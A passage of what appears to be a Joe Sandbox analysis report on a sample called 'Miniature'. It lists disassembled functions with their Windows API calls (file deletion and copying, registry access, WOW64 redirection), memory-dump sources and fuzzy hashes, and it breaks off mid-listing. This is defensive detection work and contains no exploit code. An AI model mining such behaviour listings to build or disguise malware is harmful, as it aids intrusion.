                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: 0eba4f8092ddea27b0d0f808c297f7d8000de2622a863bd16a8980a2af6f6ba4
                                                                                                                                                                                                                                                                                            • Instruction ID: 3722e6fc4fba904143e610592dcb4436ce9d4394304c8a0670e5a3bef5a09a67
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eba4f8092ddea27b0d0f808c297f7d8000de2622a863bd16a8980a2af6f6ba4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16418A74A0020AEFDB14CF61D884EABBBB9FF46329F044029F9569B250C770EE50CB60
                                                                                                                                                                                                                                                                                            Function 00C7272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C74620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C727B3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C727C6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C727F6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 12b37c675df37364e3912a1925855ed65cb4d32121a7727deee5363f696262f3
                                                                                                                                                                                                                                                                                            • Instruction ID: fec8fec26529a96a4d68e13d04097d1f90bdbbc6f75b736a4fb98be6ac1378c8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12b37c675df37364e3912a1925855ed65cb4d32121a7727deee5363f696262f3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C21E772900104BFDB09AB64DC46DFE77B8DF463A4F50812AF436971E1CB354D4AEA50
                                                                                                                                                                                                                                                                                            Function 00CA39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CA3A29
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00CA3A30
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CA3A45
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA3A4D
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                            • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                            • Opcode ID: e907b6c2b77030206e18b93a50542bcf45f80f5d2f1a43436d346452eee42ff3
                                                                                                                                                                                                                                                                                            • Instruction ID: 10c07d1035fc1f0e0453ba7c01d2139437ed3d7130cf720cedc58c4b8592aa3d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e907b6c2b77030206e18b93a50542bcf45f80f5d2f1a43436d346452eee42ff3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8621A171600256AFEF108FA4DCA0FBB77A9EB4636CF105214FAA1961D0C771CE40A760
                                                                                                                                                                                                                                                                                            Function 00C350DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C3508E,?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002), ref: 00C350FD
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C35110
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00C3508E,?,?,00C3502E,?,00CD98D8,0000000C,00C35185,?,00000002,00000000), ref: 00C35133
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                            • Opcode ID: cb5c3dfb7edbda1e17c2485c891b591c9c14136a7b31fb39c84ccacc413a66ac
                                                                                                                                                                                                                                                                                            • Instruction ID: fd3295c1fab673df740677286a72e807b8963bc57c4cba60dcb13f1cc2164489
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb5c3dfb7edbda1e17c2485c891b591c9c14136a7b31fb39c84ccacc413a66ac
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3F04F31A10208BBDB119F94DC59BEDBBB8EF44756F4400A5F907A3160DB749A40DA90
                                                                                                                                                                                                                                                                                            Function 00C1663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1664A
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C1665C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1666E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                            • Opcode ID: f5cb641c623433545440f0d59c28bda91a3bc750904e6e2b3d232da85a6a5f3e
                                                                                                                                                                                                                                                                                            • Instruction ID: 8c1dce36597f7cfbbcfbf6a5c734de7db61650ae832d8fb911bd088c3859a86f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5cb641c623433545440f0d59c28bda91a3bc750904e6e2b3d232da85a6a5f3e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AE0CD3660252257D2111725BC0CBDEA6289F83F3AB050225FE03D3210DF70CE4280E4
                                                                                                                                                                                                                                                                                            Function 00C16607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16610
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C16622
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16635
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                            • Opcode ID: f455206b9e4538d1dbd8080227e5a81dedd92babe938ee542a3470e37ac836db
                                                                                                                                                                                                                                                                                            • Instruction ID: c7c9e486f41275c92246ed6b852505b6241219c22e3d94bf13184a1f3cb9f080
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f455206b9e4538d1dbd8080227e5a81dedd92babe938ee542a3470e37ac836db
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8D0C23260253257422227207C08BCE2B149E93B353054021FA07A3124CF30CE41C198
                                                                                                                                                                                                                                                                                            Function 00C83306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C835C4
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00C83646
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C8365C
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8366D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C8367F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2cf8e79d705f912dd58fd3b3e1af5e3ba36147d514a452783c7472f2fe12c1aa
                                                                                                                                                                                                                                                                                            • Instruction ID: 7181c31905fece71575e32dd73950537cb566b11f2a84ad36736c452791bf4f1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cf8e79d705f912dd58fd3b3e1af5e3ba36147d514a452783c7472f2fe12c1aa
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACB15E72D00119ABDF11EBA4CC85EDEBBBDEF49714F0040A6F50AE7151EA309B44DB65
                                                                                                                                                                                                                                                                                            Function 00C9ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00C9AE87
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C9AE95
                                                                                                                                                                                                                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C9AEC8
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C9B09D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e482b841bee732afb7770003cf132863597e1f7147ba4410a68deeb96bbe3ff6
                                                                                                                                                                                                                                                                                            • Instruction ID: 432b38a40baed0b993a655f573efd3fe34311cae11d29c27ee93eef93d1733a5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e482b841bee732afb7770003cf132863597e1f7147ba4410a68deeb96bbe3ff6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1A1B2B1A04300AFE720DF24D886F2AB7E5AF84714F54885DF9A99B392C771ED40DB81
                                                                                                                                                                                                                                                                                            Function 00C9C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C505
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C560
                                                                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C9C5C3
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00C9C606
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C613
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9d47ac21103c3f35731928c47374c9d5fb62056ed27316d7b40bcca665b499c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 54766db871bd8133d45d6c4305d31f3889028b70e06dfeb79e3427eb1e2e2b14
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d47ac21103c3f35731928c47374c9d5fb62056ed27316d7b40bcca665b499c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52619071208241AFD714DF14C4D4E6ABBE5FF85308F54859CF09A8B2A2CB31ED46EB92
                                                                                                                                                                                                                                                                                            Function 00C7ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7D7CD,?), ref: 00C7E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7D7CD,?), ref: 00C7E72D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C7ED8A
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7EDC3
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7EF02
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7EF1A
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C7EF67
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                            • Opcode ID: bcd0aedaa51fc807f02d0aff010b9a50543cf291e9202b607c7e7e25b5601112
                                                                                                                                                                                                                                                                                            • Instruction ID: 429e61129e7c8a47ec9c77787341b1c047f58c6f3f80e4a336ead7b4ff143765
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcd0aedaa51fc807f02d0aff010b9a50543cf291e9202b607c7e7e25b5601112
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B65184B20083849BC724EBA4DC819DBB3ECEF99350F40492EF199C3151EF70A688D756
                                                                                                                                                                                                                                                                                            Function 00C79517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C79534
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C795A5
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32 ref: 00C79604
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C79677
                                                                                                                                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C796A2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 07fe1cc01671432c652ba86129c0d3aa48ca6fcab1e56368f4b8c0a6ec43e80b
                                                                                                                                                                                                                                                                                            • Instruction ID: 6b49e2487496a662e6cfd04f74bde143b96254475afa4f3954f4e74f1f56b091
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07fe1cc01671432c652ba86129c0d3aa48ca6fcab1e56368f4b8c0a6ec43e80b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A5129B5A00619EFCB14CF68C884AAAB7F9FF89314B158559F91ADB310E734E911CF90
                                                                                                                                                                                                                                                                                            Function 00C89540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C895F3
